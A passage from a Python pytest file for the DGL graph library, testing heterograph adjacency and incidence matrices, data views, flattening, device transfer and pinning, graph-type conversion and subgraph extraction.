N1 = 1 << 50 # should crash if allocated a CSR
N2 = 1 << 48
g = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([0], F.int64), F.tensor([1], F.int64)),
('user', 'plays', 'game'): (F.tensor([0], F.int64), F.tensor([N2], F.int64))},
{'user': N1, 'game': N1})
with pytest.raises(DGLError):
eid = g.edge_ids(0, 0, etype='follows')
g2 = dgl.heterograph({
('user', 'follows', 'user'): (F.tensor([0, 0], F.int64), F.tensor([1, 1], F.int64)),
('user', 'plays', 'game'): (F.tensor([0], F.int64), F.tensor([N2], F.int64))},
{'user': N1, 'game': N1}, device=F.cpu())
eid = g2.edge_ids(0, 1, etype='follows')
assert eid == 0
@parametrize_dtype
def test_adj(idtype):
g = create_test_heterograph(idtype)
adj = F.sparse_to_numpy(g.adj(transpose=True, etype='follows'))
assert np.allclose(
adj,
np.array([[0., 0., 0.],
[1., 0., 0.],
[0., 1., 0.]]))
adj = F.sparse_to_numpy(g.adj(transpose=False, etype='follows'))
assert np.allclose(
adj,
np.array([[0., 1., 0.],
[0., 0., 1.],
[0., 0., 0.]]))
adj = F.sparse_to_numpy(g.adj(transpose=True, etype='plays'))
assert np.allclose(
adj,
np.array([[1., 1., 0.],
[0., 1., 1.]]))
adj = F.sparse_to_numpy(g.adj(transpose=False, etype='plays'))
assert np.allclose(
adj,
np.array([[1., 0.],
[1., 1.],
[0., 1.]]))
adj = g.adj(transpose=True, scipy_fmt='csr', etype='follows')
assert np.allclose(
adj.todense(),
np.array([[0., 0., 0.],
[1., 0., 0.],
[0., 1., 0.]]))
adj = g.adj(transpose=True, scipy_fmt='coo', etype='follows')
assert np.allclose(
adj.todense(),
np.array([[0., 0., 0.],
[1., 0., 0.],
[0., 1., 0.]]))
adj = g.adj(transpose=True, scipy_fmt='csr', etype='plays')
assert np.allclose(
adj.todense(),
np.array([[1., 1., 0.],
[0., 1., 1.]]))
adj = g.adj(transpose=True, scipy_fmt='coo', etype='plays')
assert np.allclose(
adj.todense(),
np.array([[1., 1., 0.],
[0., 1., 1.]]))
adj = F.sparse_to_numpy(g['follows'].adj(transpose=True))
assert np.allclose(
adj,
np.array([[0., 0., 0.],
[1., 0., 0.],
[0., 1., 0.]]))
@parametrize_dtype
def test_inc(idtype):
g = create_test_heterograph(idtype)
adj = F.sparse_to_numpy(g['follows'].inc('in'))
assert np.allclose(
adj,
np.array([[0., 0.],
[1., 0.],
[0., 1.]]))
adj = F.sparse_to_numpy(g['follows'].inc('out'))
assert np.allclose(
adj,
np.array([[1., 0.],
[0., 1.],
[0., 0.]]))
adj = F.sparse_to_numpy(g['follows'].inc('both'))
assert np.allclose(
adj,
np.array([[-1., 0.],
[1., -1.],
[0., 1.]]))
adj = F.sparse_to_numpy(g.inc('in', etype='plays'))
assert np.allclose(
adj,
np.array([[1., 1., 0., 0.],
[0., 0., 1., 1.]]))
adj = F.sparse_to_numpy(g.inc('out', etype='plays'))
assert np.allclose(
adj,
np.array([[1., 0., 0., 0.],
[0., 1., 0., 1.],
[0., 0., 1., 0.]]))
adj = F.sparse_to_numpy(g.inc('both', etype='follows'))
assert np.allclose(
adj,
np.array([[-1., 0.],
[1., -1.],
[0., 1.]]))
@parametrize_dtype
def test_view(idtype):
# test single node type
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1], [1, 2])
}, idtype=idtype, device=F.ctx())
f1 = F.randn((3, 6))
g.ndata['h'] = f1
f2 = g.nodes['user'].data['h']
assert F.array_equal(f1, f2)
fail = False
try:
g.ndata['h'] = {'user' : f1}
except Exception:
fail = True
assert fail
# test single edge type
f3 = F.randn((2, 4))
g.edata['h'] = f3
f4 = g.edges['follows'].data['h']
assert F.array_equal(f3, f4)
fail = False
try:
g.edata['h'] = {'follows' : f3}
except Exception:
fail = True
assert fail
# test data view
g = create_test_heterograph(idtype)
f1 = F.randn((3, 6))
g.nodes['user'].data['h'] = f1 # ok
f2 = g.nodes['user'].data['h']
assert F.array_equal(f1, f2)
assert F.array_equal(g.nodes('user'), F.arange(0, 3, idtype))
g.nodes['user'].data.pop('h')
# multi type ndata
f1 = F.randn((3, 6))
f2 = F.randn((2, 6))
fail = False
try:
g.ndata['h'] = f1
except Exception:
fail = True
assert fail
f3 = F.randn((2, 4))
g.edges['user', 'follows', 'user'].data['h'] = f3
f4 = g.edges['user', 'follows', 'user'].data['h']
f5 = g.edges['follows'].data['h']
assert F.array_equal(f3, f4)
assert F.array_equal(f3, f5)
assert F.array_equal(g.edges(etype='follows', form='eid'), F.arange(0, 2, idtype))
g.edges['follows'].data.pop('h')
f3 = F.randn((2, 4))
fail = False
try:
g.edata['h'] = f3
except Exception:
fail = True
assert fail
# test srcdata
f1 = F.randn((3, 6))
g.srcnodes['user'].data['h'] = f1 # ok
f2 = g.srcnodes['user'].data['h']
assert F.array_equal(f1, f2)
assert F.array_equal(g.srcnodes('user'), F.arange(0, 3, idtype))
g.srcnodes['user'].data.pop('h')
# test dstdata
f1 = F.randn((3, 6))
g.dstnodes['user'].data['h'] = f1 # ok
f2 = g.dstnodes['user'].data['h']
assert F.array_equal(f1, f2)
assert F.array_equal(g.dstnodes('user'), F.arange(0, 3, idtype))
g.dstnodes['user'].data.pop('h')
@parametrize_dtype
def test_view1(idtype):
# test relation view
HG = create_test_heterograph(idtype)
ntypes = ['user', 'game', 'developer']
canonical_etypes = [
('user', 'follows', 'user'),
('user', 'plays', 'game'),
('user', 'wishes', 'game'),
('developer', 'develops', 'game')]
etypes = ['follows', 'plays', 'wishes', 'develops']
def _test_query():
for etype in etypes:
utype, _, vtype = HG.to_canonical_etype(etype)
g = HG[etype]
srcs, dsts = edges[etype]
for src, dst in zip(srcs, dsts):
assert g.has_edges_between(src, dst)
assert F.asnumpy(g.has_edges_between(srcs, dsts)).all()
srcs, dsts = negative_edges[etype]
for src, dst in zip(srcs, dsts):
assert not g.has_edges_between(src, dst)
assert not F.asnumpy(g.has_edges_between(srcs, dsts)).any()
srcs, dsts = edges[etype]
n_edges = len(srcs)
# predecessors & in_edges & in_degree
pred = [s for s, d in zip(srcs, dsts) if d == 0]
assert set(F.asnumpy(g.predecessors(0)).tolist()) == set(pred)
u, v = g.in_edges([0])
assert F.asnumpy(v).tolist() == [0] * len(pred)
assert set(F.asnumpy(u).tolist()) == set(pred)
assert g.in_degrees(0) == len(pred)
# successors & out_edges & out_degree
succ = [d for s, d in zip(srcs, dsts) if s == 0]
assert set(F.asnumpy(g.successors(0)).tolist()) == set(succ)
u, v = g.out_edges([0])
assert F.asnumpy(u).tolist() == [0] * len(succ)
assert set(F.asnumpy(v).tolist()) == set(succ)
assert g.out_degrees(0) == len(succ)
# edge_id & edge_ids
for i, (src, dst) in enumerate(zip(srcs, dsts)):
assert g.edge_ids(src, dst, etype=etype) == i
_, _, eid = g.edge_ids(src, dst, etype=etype, return_uv=True)
assert eid == i
assert F.asnumpy(g.edge_ids(srcs, dsts)).tolist() == list(range(n_edges))
u, v, e = g.edge_ids(srcs, dsts, return_uv=True)
u, v, e = F.asnumpy(u), F.asnumpy(v), F.asnumpy(e)
assert u[e].tolist() == srcs
assert v[e].tolist() == dsts
# find_edges
u, v = g.find_edges(list(range(n_edges)))
assert F.asnumpy(u).tolist() == srcs
assert F.asnumpy(v).tolist() == dsts
# all_edges.
for order in ['eid']:
u, v, e = g.all_edges(form='all', order=order)
assert F.asnumpy(u).tolist() == srcs
assert F.asnumpy(v).tolist() == dsts
assert F.asnumpy(e).tolist() == list(range(n_edges))
# in_degrees & out_degrees
in_degrees = F.asnumpy(g.in_degrees())
out_degrees = F.asnumpy(g.out_degrees())
src_count = Counter(srcs)
dst_count = Counter(dsts)
for i in range(g.number_of_nodes(utype)):
assert out_degrees[i] == src_count[i]
for i in range(g.number_of_nodes(vtype)):
assert in_degrees[i] == dst_count[i]
edges = {
'follows': ([0, 1], [1, 2]),
'plays': ([0, 1, 2, 1], [0, 0, 1, 1]),
'wishes': ([0, 2], [1, 0]),
'develops': ([0, 1], [0, 1]),
}
# edges that does not exist in the graph
negative_edges = {
'follows': ([0, 1], [0, 1]),
'plays': ([0, 2], [1, 0]),
'wishes': ([0, 1], [0, 1]),
'develops': ([0, 1], [1, 0]),
}
_test_query()
etypes = canonical_etypes
edges = {
('user', 'follows', 'user'): ([0, 1], [1, 2]),
('user', 'plays', 'game'): ([0, 1, 2, 1], [0, 0, 1, 1]),
('user', 'wishes', 'game'): ([0, 2], [1, 0]),
('developer', 'develops', 'game'): ([0, 1], [0, 1]),
}
# edges that does not exist in the graph
negative_edges = {
('user', 'follows', 'user'): ([0, 1], [0, 1]),
('user', 'plays', 'game'): ([0, 2], [1, 0]),
('user', 'wishes', 'game'): ([0, 1], [0, 1]),
('developer', 'develops', 'game'): ([0, 1], [1, 0]),
}
_test_query()
# test features
HG.nodes['user'].data['h'] = F.ones((HG.number_of_nodes('user'), 5))
HG.nodes['game'].data['m'] = F.ones((HG.number_of_nodes('game'), 3)) * 2
# test only one node type
g = HG['follows']
assert g.number_of_nodes() == 3
# test ndata and edata
f1 = F.randn((3, 6))
g.ndata['h'] = f1 # ok
f2 = HG.nodes['user'].data['h']
assert F.array_equal(f1, f2)
assert F.array_equal(g.nodes(), F.arange(0, 3, g.idtype))
f3 = F.randn((2, 4))
g.edata['h'] = f3
f4 = HG.edges['follows'].data['h']
assert F.array_equal(f3, f4)
assert F.array_equal(g.edges(form='eid'), F.arange(0, 2, g.idtype))
@parametrize_dtype
def test_flatten(idtype):
def check_mapping(g, fg):
if len(fg.ntypes) == 1:
SRC = DST = fg.ntypes[0]
else:
SRC = fg.ntypes[0]
DST = fg.ntypes[1]
etypes = F.asnumpy(fg.edata[dgl.ETYPE]).tolist()
eids = F.asnumpy(fg.edata[dgl.EID]).tolist()
for i, (etype, eid) in enumerate(zip(etypes, eids)):
src_g, dst_g = g.find_edges([eid], g.canonical_etypes[etype])
src_fg, dst_fg = fg.find_edges([i])
# TODO(gq): I feel this code is quite redundant; can we just add new members (like
# "induced_srcid") to returned heterograph object and not store them as features?
assert F.asnumpy(src_g) == F.asnumpy(F.gather_row(fg.nodes[SRC].data[dgl.NID], src_fg)[0])
tid = F.asnumpy(F.gather_row(fg.nodes[SRC].data[dgl.NTYPE], src_fg)).item()
assert g.canonical_etypes[etype][0] == g.ntypes[tid]
assert F.asnumpy(dst_g) == F.asnumpy(F.gather_row(fg.nodes[DST].data[dgl.NID], dst_fg)[0])
tid = F.asnumpy(F.gather_row(fg.nodes[DST].data[dgl.NTYPE], dst_fg)).item()
assert g.canonical_etypes[etype][2] == g.ntypes[tid]
# check for wildcard slices
g = create_test_heterograph(idtype)
g.nodes['user'].data['h'] = F.ones((3, 5))
g.nodes['game'].data['i'] = F.ones((2, 5))
g.edges['plays'].data['e'] = F.ones((4, 4))
g.edges['wishes'].data['e'] = F.ones((2, 4))
g.edges['wishes'].data['f'] = F.ones((2, 4))
fg = g['user', :, 'game'] # user--plays->game and user--wishes->game
assert len(fg.ntypes) == 2
assert fg.ntypes == ['user', 'game']
assert fg.etypes == ['plays+wishes']
assert fg.idtype == g.idtype
assert fg.device == g.device
etype = fg.etypes[0]
assert fg[etype] is not None # Issue #2166
assert F.array_equal(fg.nodes['user'].data['h'], F.ones((3, 5)))
assert F.array_equal(fg.nodes['game'].data['i'], F.ones((2, 5)))
assert F.array_equal(fg.edata['e'], F.ones((6, 4)))
assert 'f' not in fg.edata
etypes = F.asnumpy(fg.edata[dgl.ETYPE]).tolist()
eids = F.asnumpy(fg.edata[dgl.EID]).tolist()
assert set(zip(etypes, eids)) == set([(3, 0), (3, 1), (2, 1), (2, 0), (2, 3), (2, 2)])
check_mapping(g, fg)
fg = g['user', :, 'user']
assert fg.idtype == g.idtype
assert fg.device == g.device
# NOTE(gq): The node/edge types from the parent graph is returned if there is only one
# node/edge type. This differs from the behavior above.
assert fg.ntypes == ['user']
assert fg.etypes == ['follows']
u1, v1 = g.edges(etype='follows', order='eid')
u2, v2 = fg.edges(etype='follows', order='eid')
assert F.array_equal(u1, u2)
assert F.array_equal(v1, v2)
fg = g['developer', :, 'game']
assert fg.idtype == g.idtype
assert fg.device == g.device
assert fg.ntypes == ['developer', 'game']
assert fg.etypes == ['develops']
u1, v1 = g.edges(etype='develops', order='eid')
u2, v2 = fg.edges(etype='develops', order='eid')
assert F.array_equal(u1, u2)
assert F.array_equal(v1, v2)
fg = g[:, :, :]
assert fg.idtype == g.idtype
assert fg.device == g.device
assert fg.ntypes == ['developer+user', 'game+user']
assert fg.etypes == ['develops+follows+plays+wishes']
check_mapping(g, fg)
# Test another heterograph
g = dgl.heterograph({
('user', 'follows', 'user'): ([0, 1, 2], [1, 2, 3]),
('user', 'knows', 'user'): ([0, 2], [2, 3])
}, idtype=idtype, device=F.ctx())
g.nodes['user'].data['h'] = F.randn((4, 3))
g.edges['follows'].data['w'] = F.randn((3, 2))
g.nodes['user'].data['hh'] = F.randn((4, 5))
g.edges['knows'].data['ww'] = F.randn((2, 10))
fg = g['user', :, 'user']
assert fg.idtype == g.idtype
assert fg.device == g.device
assert fg.ntypes == ['user']
assert fg.etypes == ['follows+knows']
check_mapping(g, fg)
fg = g['user', :, :]
assert fg.idtype == g.idtype
assert fg.device == g.device
assert fg.ntypes == ['user']
assert fg.etypes == ['follows+knows']
check_mapping(g, fg)
@unittest.skipIf(F._default_context_str == 'cpu', reason="Need gpu for this test")
@parametrize_dtype
def test_to_device(idtype):
# TODO: rewrite this test case to accept different graphs so we
# can test reverse graph and batched graph
g = create_test_heterograph(idtype)
g.nodes['user'].data['h'] = F.ones((3, 5))
g.nodes['game'].data['i'] = F.ones((2, 5))
g.edges['plays'].data['e'] = F.ones((4, 4))
assert g.device == F.ctx()
g = g.to(F.cpu())
assert g.device == F.cpu()
assert F.context(g.nodes['user'].data['h']) == F.cpu()
assert F.context(g.nodes['game'].data['i']) == F.cpu()
assert F.context(g.edges['plays'].data['e']) == F.cpu()
for ntype in g.ntypes:
assert F.context(g.batch_num_nodes(ntype)) == F.cpu()
for etype in g.canonical_etypes:
assert F.context(g.batch_num_edges(etype)) == F.cpu()
if F.is_cuda_available():
g1 = g.to(F.cuda())
assert g1.device == F.cuda()
assert F.context(g1.nodes['user'].data['h']) == F.cuda()
assert F.context(g1.nodes['game'].data['i']) == F.cuda()
assert F.context(g1.edges['plays'].data['e']) == F.cuda()
for ntype in g1.ntypes:
assert F.context(g1.batch_num_nodes(ntype)) == F.cuda()
for etype in g1.canonical_etypes:
assert F.context(g1.batch_num_edges(etype)) == F.cuda()
assert F.context(g.nodes['user'].data['h']) == F.cpu()
assert F.context(g.nodes['game'].data['i']) == F.cpu()
assert F.context(g.edges['plays'].data['e']) == F.cpu()
for ntype in g.ntypes:
assert F.context(g.batch_num_nodes(ntype)) == F.cpu()
for etype in g.canonical_etypes:
assert F.context(g.batch_num_edges(etype)) == F.cpu()
with pytest.raises(DGLError):
g1.nodes['user'].data['h'] = F.copy_to(F.ones((3, 5)), F.cpu())
with pytest.raises(DGLError):
g1.edges['plays'].data['e'] = F.copy_to(F.ones((4, 4)), F.cpu())
@unittest.skipIf(F._default_context_str == 'cpu', reason="Need gpu for this test")
@parametrize_dtype
@pytest.mark.parametrize('g', get_cases(['block']))
def test_to_device2(g, idtype):
g = g.astype(idtype)
g = g.to(F.cpu())
assert g.device == F.cpu()
if F.is_cuda_available():
g1 = g.to(F.cuda())
assert g1.device == F.cuda()
assert g1.ntypes == g.ntypes
assert g1.etypes == g.etypes
assert g1.canonical_etypes == g.canonical_etypes
@unittest.skipIf(F._default_context_str == 'cpu', reason="Need gpu for this test")
@unittest.skipIf(dgl.backend.backend_name != "pytorch", reason="Pinning graph inplace only supported for PyTorch")
@parametrize_dtype
def test_pin_memory_(idtype):
# TODO: rewrite this test case to accept different graphs so we
# can test reverse graph and batched graph
g = create_test_heterograph(idtype)
g.nodes['user'].data['h'] = F.ones((3, 5))
g.nodes['game'].data['i'] = F.ones((2, 5))
g.edges['plays'].data['e'] = F.ones((4, 4))
g = g.to(F.cpu())
assert not g.is_pinned()
if F.is_cuda_available():
# unpin an unpinned CPU graph, directly return
g.unpin_memory_()
assert not g.is_pinned()
assert g.device == F.cpu()
# pin a CPU graph
g.pin_memory_()
assert g.is_pinned()
assert g.device == F.cpu()
assert F.context(g.nodes['user'].data['h']) == F.cpu()
assert F.context(g.nodes['game'].data['i']) == F.cpu()
assert F.context(g.edges['plays'].data['e']) == F.cpu()
for ntype in g.ntypes:
assert F.context(g.batch_num_nodes(ntype)) == F.cpu()
for etype in g.canonical_etypes:
assert F.context(g.batch_num_edges(etype)) == F.cpu()
# it's fine to clone with new formats, but new graphs are not pinned
# >>> g.formats()
# {'created': ['coo'], 'not created': ['csr', 'csc']}
assert not g.formats('csc').is_pinned()
assert not g.formats('csr').is_pinned()
# 'coo' formats is already created and thus not cloned
assert g.formats('coo').is_pinned()
# pin a pinned graph, directly return
g.pin_memory_()
assert g.is_pinned()
assert g.device == F.cpu()
# unpin a pinned graph
g.unpin_memory_()
assert not g.is_pinned()
assert g.device == F.cpu()
g1 = g.to(F.cuda())
# unpin an unpinned GPU graph, directly return
g1.unpin_memory_()
assert not g1.is_pinned()
assert g1.device == F.cuda()
# error pinning a GPU graph
with pytest.raises(DGLError):
g1.pin_memory_()
@parametrize_dtype
def test_convert_bound(idtype):
def _test_bipartite_bound(data, card):
with pytest.raises(DGLError):
dgl.heterograph({
('_U', '_E', '_V'): data
}, {'_U': card[0], '_V': card[1]}, idtype=idtype, device=F.ctx())
def _test_graph_bound(data, card):
with pytest.raises(DGLError):
dgl.graph(data, num_nodes=card, idtype=idtype, device=F.ctx())
_test_bipartite_bound(([1, 2], [1, 2]), (2, 3))
_test_bipartite_bound(([0, 1], [1, 4]), (2, 3))
_test_graph_bound(([1, 3], [1, 2]), 3)
_test_graph_bound(([0, 1], [1, 3]), 3)
@parametrize_dtype
def test_convert(idtype):
hg = create_test_heterograph(idtype)
hs = []
for ntype in hg.ntypes:
h = F.randn((hg.number_of_nodes(ntype), 5))
hg.nodes[ntype].data['h'] = h
hs.append(h)
hg.nodes['user'].data['x'] = F.randn((3, 3))
ws = []
for etype in hg.canonical_etypes:
w = F.randn((hg.number_of_edges(etype), 5))
hg.edges[etype].data['w'] = w
ws.append(w)
hg.edges['plays'].data['x'] = F.randn((4, 3))
g = dgl.to_homogeneous(hg, ndata=['h'], edata=['w'])
assert g.idtype == idtype
assert g.device == hg.device
assert F.array_equal(F.cat(hs, dim=0), g.ndata['h'])
assert 'x' not in g.ndata
assert F.array_equal(F.cat(ws, dim=0), g.edata['w'])
assert 'x' not in g.edata
src, dst = g.all_edges(order='eid')
src = F.asnumpy(src)
dst = F.asnumpy(dst)
etype_id, eid = F.asnumpy(g.edata[dgl.ETYPE]), F.asnumpy(g.edata[dgl.EID])
ntype_id, nid = F.asnumpy(g.ndata[dgl.NTYPE]), F.asnumpy(g.ndata[dgl.NID])
for i in range(g.number_of_edges()):
srctype = hg.ntypes[ntype_id[src[i]]]
dsttype = hg.ntypes[ntype_id[dst[i]]]
etype = hg.etypes[etype_id[i]]
src_i, dst_i = hg.find_edges([eid[i]], (srctype, etype, dsttype))
assert np.asscalar(F.asnumpy(src_i)) == nid[src[i]]
assert np.asscalar(F.asnumpy(dst_i)) == nid[dst[i]]
mg = nx.MultiDiGraph([
('user', 'user', 'follows'),
('user', 'game', 'plays'),
('user', 'game', 'wishes'),
('developer', 'game', 'develops')])
for _mg in [None, mg]:
hg2 = dgl.to_heterogeneous(
g, hg.ntypes, hg.etypes,
ntype_field=dgl.NTYPE, etype_field=dgl.ETYPE, metagraph=_mg)
assert hg2.idtype == hg.idtype
assert hg2.device == hg.device
assert set(hg.ntypes) == set(hg2.ntypes)
assert set(hg.canonical_etypes) == set(hg2.canonical_etypes)
for ntype in hg.ntypes:
assert hg.number_of_nodes(ntype) == hg2.number_of_nodes(ntype)
assert F.array_equal(hg.nodes[ntype].data['h'], hg2.nodes[ntype].data['h'])
for canonical_etype in hg.canonical_etypes:
src, dst = hg.all_edges(etype=canonical_etype, order='eid')
src2, dst2 = hg2.all_edges(etype=canonical_etype, order='eid')
assert F.array_equal(src, src2)
assert F.array_equal(dst, dst2)
assert F.array_equal(hg.edges[canonical_etype].data['w'], hg2.edges[canonical_etype].data['w'])
# hetero_from_homo test case 2
g = dgl.graph(([0, 1, 2, 0], [2, 2, 3, 3]), idtype=idtype, device=F.ctx())
g.ndata[dgl.NTYPE] = F.tensor([0, 0, 1, 2])
g.edata[dgl.ETYPE] = F.tensor([0, 0, 1, 2])
hg = dgl.to_heterogeneous(g, ['l0', 'l1', 'l2'], ['e0', 'e1', 'e2'])
assert hg.idtype == idtype
assert hg.device == g.device
assert set(hg.canonical_etypes) == set(
[('l0', 'e0', 'l1'), ('l1', 'e1', 'l2'), ('l0', 'e2', 'l2')])
assert hg.number_of_nodes('l0') == 2
assert hg.number_of_nodes('l1') == 1
assert hg.number_of_nodes('l2') == 1
assert hg.number_of_edges('e0') == 2
assert hg.number_of_edges('e1') == 1
assert hg.number_of_edges('e2') == 1
assert F.array_equal(hg.ndata[dgl.NID]['l0'], F.tensor([0, 1], F.int64))
assert F.array_equal(hg.ndata[dgl.NID]['l1'], F.tensor([2], F.int64))
assert F.array_equal(hg.ndata[dgl.NID]['l2'], F.tensor([3], F.int64))
assert F.array_equal(hg.edata[dgl.EID][('l0', 'e0', 'l1')], F.tensor([0, 1], F.int64))
assert F.array_equal(hg.edata[dgl.EID][('l0', 'e2', 'l2')], F.tensor([3], F.int64))
assert F.array_equal(hg.edata[dgl.EID][('l1', 'e1', 'l2')], F.tensor([2], F.int64))
# hetero_from_homo test case 3
mg = nx.MultiDiGraph([
('user', 'movie', 'watches'),
('user', 'TV', 'watches')])
g = dgl.graph(((0, 0), (1, 2)), idtype=idtype, device=F.ctx())
g.ndata[dgl.NTYPE] = F.tensor([0, 1, 2])
g.edata[dgl.ETYPE] = F.tensor([0, 0])
for _mg in [None, mg]:
hg = dgl.to_heterogeneous(g, ['user', 'TV', 'movie'], ['watches'], metagraph=_mg)
assert hg.idtype == g.idtype
assert hg.device == g.device
assert set(hg.canonical_etypes) == set(
[('user', 'watches', 'movie'), ('user', 'watches', 'TV')])
assert hg.number_of_nodes('user') == 1
assert hg.number_of_nodes('TV') == 1
assert hg.number_of_nodes('movie') == 1
assert hg.number_of_edges(('user', 'watches', 'TV')) == 1
assert hg.number_of_edges(('user', 'watches', 'movie')) == 1
assert len(hg.etypes) == 2
# hetero_to_homo test case 2
hg = dgl.heterograph({
('_U', '_E', '_V'): ([0, 1], [0, 1])
}, {'_U': 2, '_V': 3}, idtype=idtype, device=F.ctx())
g = dgl.to_homogeneous(hg)
assert hg.idtype == g.idtype
assert hg.device == g.device
assert g.number_of_nodes() == 5
# hetero_to_subgraph_to_homo
hg = dgl.heterograph({
('user', 'plays', 'game'): ([0, 1, 1, 2], [0, 0, 2, 1]),
('user', 'follows', 'user'): ([0, 1, 1], [1, 2, 2])
}, idtype=idtype, device=F.ctx())
hg.nodes['user'].data['h'] = F.copy_to(
F.tensor([[1, 0], [0, 1], [1, 1]], dtype=idtype), ctx=F.ctx())
sg = dgl.node_subgraph(hg, {'user': [1, 2]})
assert len(sg.ntypes) == 2
assert len(sg.etypes) == 2
assert sg.num_nodes('user') == 2
assert sg.num_nodes('game') == 0
g = dgl.to_homogeneous(sg, ndata=['h'])
assert 'h' in g.ndata.keys()
assert g.num_nodes() == 2
@unittest.skipIf(F._default_context_str == 'gpu', reason="Test on cpu is enough")
@parametrize_dtype
def test_to_homo_zero_nodes(idtype):
# Fix gihub issue #2870
g = dgl.heterograph({
('A', 'AB', 'B'): (np.random.randint(0, 200, (1000,)), np.random.randint(0, 200, (1000,))),
('B', 'BA', 'A'): (np.random.randint(0, 200, (1000,)), np.random.randint(0, 200, (1000,))),
}, num_nodes_dict={'A': 200, 'B': 200, 'C': 0}, idtype=idtype)
g.nodes['A'].data['x'] = F.randn((200, 3))
g.nodes['B'].data['x'] = F.randn((200, 3))
gg = dgl.to_homogeneous(g, ['x'])
assert 'x' in gg.ndata
@parametrize_dtype
def test_to_homo2(idtype):
# test the result homogeneous graph has nodes and edges sorted by their types
hg = create_test_heterograph(idtype)
g = dgl.to_homogeneous(hg)
ntypes = F.asnumpy(g.ndata[dgl.NTYPE])
etypes = F.asnumpy(g.edata[dgl.ETYPE])
p = 0
for tid, ntype in enumerate(hg.ntypes):
num_nodes = hg.num_nodes(ntype)
for i in range(p, p + num_nodes):
assert ntypes[i] == tid
p += num_nodes
p = 0
for tid, etype in enumerate(hg.canonical_etypes):
num_edges = hg.num_edges(etype)
for i in range(p, p + num_edges):
assert etypes[i] == tid
p += num_edges
# test store_type=False
g = dgl.to_homogeneous(hg, store_type=False)
assert dgl.NTYPE not in g.ndata
assert dgl.ETYPE not in g.edata
# test return_count=True
g, ntype_count, etype_count = dgl.to_homogeneous(hg, return_count=True)
for i, count in enumerate(ntype_count):
assert count == hg.num_nodes(hg.ntypes[i])
for i, count in enumerate(etype_count):
assert count == hg.num_edges(hg.canonical_etypes[i])
@parametrize_dtype
def test_invertible_conversion(idtype):
# Test whether to_homogeneous and to_heterogeneous are invertible
hg = create_test_heterograph(idtype)
g = dgl.to_homogeneous(hg)
hg2 = dgl.to_heterogeneous(g, hg.ntypes, hg.etypes)
assert_is_identical_hetero(hg, hg2, True)
@parametrize_dtype
def test_metagraph_reachable(idtype):
g = create_test_heterograph(idtype)
x = F.randn((3, 5))
g.nodes['user'].data['h'] = x
new_g = dgl.metapath_reachable_graph(g, ['follows', 'plays'])
assert new_g.idtype == idtype
assert new_g.ntypes == ['game', 'user']
assert new_g.number_of_edges() == 3
assert F.asnumpy(new_g.has_edges_between([0, 0, 1], [0, 1, 1])).all()
new_g = dgl.metapath_reachable_graph(g, ['follows'])
assert new_g.idtype == idtype
assert new_g.ntypes == ['user']
assert new_g.number_of_edges() == 2
assert F.asnumpy(new_g.has_edges_between([0, 1], [1, 2])).all()
@unittest.skipIf(dgl.backend.backend_name == "mxnet", reason="MXNet doesn't support bool tensor")
@parametrize_dtype
def test_subgraph_mask(idtype):
g = create_test_heterograph(idtype)
g_graph = g['follows']
g_bipartite = g['plays']
x = F.randn((3, 5))
y = F.randn((2, 4))
g.nodes['user'].data['h'] = x
g.edges['follows'].data['h'] = y
def _check_subgraph(g, sg):
assert sg.idtype == g.idtype
assert sg.device == g.device
assert sg.ntypes == g.ntypes
assert sg.etypes == g.etypes
assert sg.canonical_etypes == g.canonical_etypes
assert F.array_equal(F.tensor(sg.nodes['user'].data[dgl.NID]),
F.tensor([1, 2], idtype))
assert F.array_equal(F.tensor(sg.nodes['game'].data[dgl.NID]),
F.tensor([0], idtype))
assert F.array_equal(F.tensor(sg.edges['follows'].data[dgl.EID]),
F.tensor([1], idtype))
assert F.array_equal(F.tensor(sg.edges['plays'].data[dgl.EID]),
F.tensor([1], idtype))
assert F.array_equal(F.tensor(sg.edges['wishes'].data[dgl.EID]),
F.tensor([1], idtype))
assert sg.number_of_nodes('developer') == 0
assert sg.number_of_edges('develops') == 0
assert F.array_equal(sg.nodes['user'].data['h'], g.nodes['user'].data['h'][1:3])
assert F.array_equal(sg.edges['follows'].data['h'], g.edges['follows'].data['h'][1:2])
sg1 = g.subgraph({'user': F.tensor([False, True, True], dtype=F.bool),
'game': F.tensor([True, False, False, False], dtype=F.bool)})
_check_subgraph(g, sg1)
if F._default_context_str != 'gpu':
# TODO(minjie): enable this later
sg2 = g.edge_subgraph({'follows': F.tensor([False, True], dtype=F.bool),
'plays': F.tensor([False, True, False, False], dtype=F.bool),
'wishes': F.tensor([False, True], dtype=F.bool)})
_check_subgraph(g, sg2)
@parametrize_dtype
def test_subgraph(idtype):
g = create_test_heterograph(idtype)
g_graph = g['follows']
g_bipartite = g['plays']
x = F.randn((3, 5))
y = F.randn((2, 4))
g.nodes['user'].data['h'] = x
g.edges['follows'].data['h'] = y
def _check_subgraph(g, sg):
assert sg.idtype == g.idtype
assert sg.device == g.device
assert sg.ntypes == g.ntypes
assert sg.etypes == g.etypes
assert sg.canonical_etypes == g.canonical_etypes
assert F.array_equal(F.tensor(sg.nodes['user'].data[dgl.NID]),
F.tensor([1, 2], g.idtype))
assert F.array_equal(F.tensor(sg.nodes['game'].data[dgl.NID]),
F.tensor([0], g.idtype))
assert F.array_equal(F.tensor(sg.edges['follows'].data[dgl.EID]),
F.tensor([1], g.idtype))
assert F.array_equal(F.tensor(sg.edges['plays'].data[dgl.EID]),
F.tensor([1], g.idtype))
assert F.array_equal(F.tensor(sg.edges['wishes'].data[dgl.EID]),
F.tensor([1], g.idtype))
assert sg.number_of_nodes('developer') == 0
assert sg.number_of_edges('develops') == 0
assert F.array_equal(sg.nodes['user'].data['h'], g.nodes['user'].data['h'][1:3])
assert F.array_equal(sg.edges['follows'].data['h'], g.edges['follows'].data['h'][1:2])
sg1 = g.subgraph({'user': [1, 2], 'game': [0]})
_check_subgraph(g, sg1)
if F._default_context_str != 'gpu':
# TODO(minjie): enable this later
sg2 = g.edge_subgraph({'follows': [1], 'plays': [1], 'wishes': [1]})
_check_subgraph(g, sg2)
# backend tensor input
sg1 = g.subgraph({'user': F.tensor([1, 2], dtype=idtype),
'game': F.tensor([0], dtype=idtype)})
_check_subgraph(g, sg1)
if F._default_context_str != 'gpu':
# TODO(minjie): enable this later
sg2 = g.edge_subgraph({'follows': F.tensor([1], dtype=idtype),
'plays': F.tensor([1], dtype=idtype),
'wishes': F.tensor([1], dtype=idtype)})
_check_subgraph(g, sg2)
# numpy input
sg1 = g.subgraph({'user': np.array([1, 2]),
'game': np.array([0])})
_check_subgraph(g, sg1)
if F._default_context_str != 'gpu':
